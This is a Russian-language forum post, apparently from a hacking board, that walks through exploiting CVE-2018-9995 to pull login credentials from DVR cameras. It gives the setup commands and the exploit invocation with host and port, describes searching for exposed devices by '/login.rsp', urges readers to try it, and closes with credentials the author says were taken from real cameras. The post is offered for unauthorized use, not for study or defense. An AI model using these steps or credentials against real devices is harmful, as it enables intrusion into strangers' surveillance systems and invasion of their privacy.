CVE-2018-9995 или логин пароль от камеры DVR

PR0FILER1

Пользователь
Новорег
Старичок Старичок Старичок
[LIKES=1]
Всем привет! Моя первая темка на этом форуме, так что строго не судите!

Для начала что нам понадобится:
  1. Kali
  2. Python
  3. Сама уязвимость(скачать с гита)
  4. Ctrl+c,Ctrl+V
Начнём:

Сначала устанавливаем python командой:
  • apt-get python2.7
потом скачиваем уязвимость командой:
после этого переходим в директорию самого эксплоита командой:
  • cd CVE-2018-9995_dvr_credentials
и что-бы узнать всё что там находится прописываем:
  • ls
и устанавливаем requirements.txt командой:
  • pip install -r requirements.txt
Всё теперь всё установлено.
для того что бы узнать пароль от камеры пишем команду:
  • python getDVR_Credentials.py --host IP -p PORT
пример:
  • python getDVR_Credentials.py --host 192.168.1.101 -p 81


чтобы найти камеры заходим на сайт:
и вводим в поиск
  • "/login.rsp"
и видим кучу сайтов переходим на них и видим в адресной строке ссылку такого формата:
IP:pORT/login.rsp
и всё у вас появится окно такого формата:​
poc_4.png

и всё теперь можем заходить и проверять​
лично проверял всё работает, если что надо помочь вам или что-то ещё пишите в теме!

также камеры которые я сам перебирал, дерзайте:

[LIKES=3]
Вам необходимо выполнить Вход либо Регистрация для просмотра ссылок!
admin:09Trans
Вам необходимо выполнить Вход либо Регистрация для просмотра ссылок!
admin
Вам необходимо выполнить Вход либо Регистрация для просмотра ссылок!
admin
Вам необходимо выполнить Вход либо Регистрация для просмотра ссылок!
admin:bgwpns
Вам необходимо выполнить Вход либо Регистрация для просмотра ссылок!
admin
Вам необходимо выполнить Вход либо Регистрация для просмотра ссылок!
admin
[/LIKES]
[/LIKES]
 
Последнее редактирование:
Назад
Сверху